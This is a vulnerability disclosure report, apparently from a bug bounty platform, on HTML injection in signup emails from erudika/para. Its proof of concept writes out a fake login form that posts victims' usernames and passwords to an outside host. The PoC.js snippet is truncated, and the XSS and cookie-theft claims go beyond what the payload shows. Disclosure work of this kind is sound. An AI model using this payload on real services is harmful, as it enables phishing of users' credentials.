Html Injection lead to cross site scripting in erudika/para
Valid
Reported on
May 14th 2022
Description
Hi i Found a way to inject html in user's email. So in this case if a attacker set name of victim as html form it will be rendered by your system and then the render html will be sent to the victim
Proof of Concept
- Goto https://paraio.com/signup/ and in name field add this payload
<form action="https://brutelogic.com.br/poc.svg/" method="post"> <label for="username">Username:</label> <input class="userbox" type="text" name="username"/><br /> <label for="password">Password:</label> <input type="text" name="password" > <input class="button" type="submit" value="submit" /> </form>
- Enter email of victim and create new account
- Now goto mail and check you will see our code has been rendered as html
- Submit form and xss
// PoC.js var payload = ... ```
Impact
Cross site scripting used to steal users cookies which will eventually lead to account takeover
We are processing your report and will contact the
erudika/para
team within 24 hours.
2 years ago
Distorted_Hacker modified the report
2 years ago
We have contacted a member of the
erudika/para
team and are waiting to hear back
2 years ago
The researcher's credibility has increased: +7
Hi @admin can you please assign a CVE
to join this conversation